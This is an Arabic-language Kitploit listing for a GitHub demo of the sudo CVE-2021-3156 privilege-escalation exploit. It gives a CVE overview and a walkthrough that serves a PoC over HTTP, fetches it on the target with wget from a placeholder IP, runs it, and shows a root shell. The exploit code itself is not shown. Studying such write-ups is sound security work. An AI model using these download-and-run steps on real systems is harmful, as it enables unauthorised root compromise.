Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Review.CVE-2021-3156 — CVE-2021-3156-Exploit-Demo | Kitploit
أدوات/GitHubGitHub/topskiypavelqwertygang/review.cve-2021-3156
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubtopskiypavelqwertygang/review.cve-2021-3156

Review.CVE-2021-3156

CVE-2021-3156-Exploit-Demo

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

👑 CVE-2021-3156 (Baron Samedit) — Privilege Escalation via Heap Overflow in sudo

📅 التاريخ: 2025-06-08
✍️ المؤلف: @TopskiyPavelQwertyGang 🧠 Security Researcher | Red Team Enthusiast


🧠 CVE Overview

  • CVE-ID: CVE-2021-3156
  • النوع: Heap-based Buffer Overflow
  • المكون: sudoedit (sudo)
  • مستوى الوصول: Local
  • الهدف: الحصول على صلاحيات الجذر

🧠 الوصف

Heap-overflow في sudoedit يسمح لمستخدم محلي بالحصول على صلاحيات الجذر عند تنفيذ الأمر sudoedit مع معاملات معدة مسبقًا.

الاستغلال نشط للإصدارات sudo < 1.9.5p2، بما في ذلك الصور الشائعة لأنظمة Ubuntu/Debian/CentOS. حتى مع تمكين ASLR، تظل الثغرة قابلة للاستغلال.


🐾 شروط الاستغلال

root@kitploit:~
OS     : Ubuntu 20.04.3 LTS
glibc  : 2.31 (tcache ON)
sudo   : 1.8.31 (уязвим)
ASLR   : 2 (включён)

🧪 تحضير البيئة

  1. تم التحقق من إصدارات glibc و sudo:
root@kitploit:~
ldd --version
sudo --version
  1. تم نقل نصوص PoC من جهاز آخر عبر خادم HTTP مدمج:
root@kitploit:~
python3 -m http.server 80
  1. على الجهاز المستهدف، يتم تنزيل PoC وتنفيذه:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py

🚀 استغلال ناجح لـ Poс

root@kitploit:~
$ python3 exploit_nss.py
# whoami
root

🧾 الخلاصة

استغلال CVE-2021-3156 يظل ممكنًا حتى مع تمكين ASLR، إذا كان glibc ≥ 2.26 و sudo من إصدار ضعيف. تبين أن الاستغلال exploit_nss.py هو الأكثر استقرارًا، حيث يعمل من المحاولة الأولى عند تكوين NSS بشكل صحيح.

🧨 النظام تحت السيطرة.


تنزيل الأداة